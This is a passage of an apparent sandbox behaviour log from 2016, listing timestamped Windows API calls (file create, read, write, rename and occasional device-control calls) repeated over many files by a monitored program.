"MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,729", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,729", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,729", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,729", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,729", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,729", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,729", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,729", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,739", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,739", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,739", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,739", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,739", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,739", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,739", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,739", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,739", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,739", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,739", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,739", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,739", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,739", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,739", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,749", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,749", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,749", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,749", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,749", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,749", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,749", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,749", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,749", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,749", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,749", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,749", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,759", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,759", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,759", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,759", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,759", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,769", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,769", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,769", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,769", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,769", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,769", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,769", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,769", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,769", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,769", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,769", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,779", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,779", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,779", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,779", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,779", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,779", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,779", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,779", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,779", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,779", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,779", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,779", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,779", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,779", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,779", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,779", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,789", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,789", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,789", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,789", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,789", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,789", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,789", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,789", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,789", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,789", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,789", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,800", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,800", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,800", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,800", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,800", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,800", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,800", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,800", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,800", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,800", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,800", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,800", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,800", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,800", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,800", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,800", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,800", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,810", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,810", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,810", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,810", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,810", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,810", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,810", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,810", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,810", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,820", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,820", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,820", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,820", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,820", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,820", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,820", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,820", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,820", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,830", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,830", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,830", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,830", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,830", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,830", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,830", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,830", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,840", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,840", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,840", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,840", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,840", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,840", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,840", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,850", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,850", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,850", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,850", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,850", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,850", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,850", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,850", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,850", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,860", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,860", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,860", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,860", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,860", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,860", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,860", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,860", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,860", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,860", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,860", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,860", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,870", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,870", "api": "NtFreeVirtualMemory"}, {"category": "device", "timestamp": "2016-02-16 17:41:53,870", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,870", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,870", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,870", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,870", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,870", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,870", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,870", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,870", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,870", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,870", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,880", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,880", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,880", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,880", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,880", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,880", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,880", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,880", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,890", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,890", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,890", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,890", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,890", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,890", "api": "NtFreeVirtualMemory"}, {"category": "device", "timestamp": "2016-02-16 17:41:53,890", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:53,890", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:53,890", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:53,890", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:53,890", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:53,890", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,890", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,900", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,900", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,900", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,900", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,900", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,900", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,900", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,900", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,910", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,910", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,910", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,910", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,910", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,910", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,910", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,910", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,920", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,920", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,920", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,920", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,920", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,920", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,920", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,920", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,920", "api": "MoveFileWithProgressW"}, {"category": "device", "timestamp": "2016-02-16 17:41:53,930", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,930", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,930", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,930", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,930", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,930", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,930", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,930", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,930", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,940", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,940", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,940", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,940", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,940", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,940", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,940", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,940", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,940", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,940", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,940", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,950", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,950", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,950", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,950", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,950", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,950", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,950", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,950", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,950", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,950", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,950", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,950", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,960", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,960", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,960", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,960", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,960", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,960", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,960", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,960", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,960", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,970", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,970", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,970", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,970", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,970", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,970", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,970", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,970", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,970", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,970", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,970", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,970", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,970", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,970", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,970", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,970", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,980", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,980", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,980", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,980", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,980", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,980", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,980", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,980", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,980", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,980", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,980", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,980", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,980", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,980", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,990", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,990", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,990", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,990", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,990", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,990", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,990", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,990", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,990", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,990", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,990", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,000", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,000", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,000", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,000", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,000", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,000", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,000", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,000", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,000", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,000", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,000", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,000", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,000", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,000", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,060", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,060", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,070", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,070", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,070", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,070", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,070", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,070", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,070", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,080", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,080", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,080", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,080", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,080", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,080", "api": 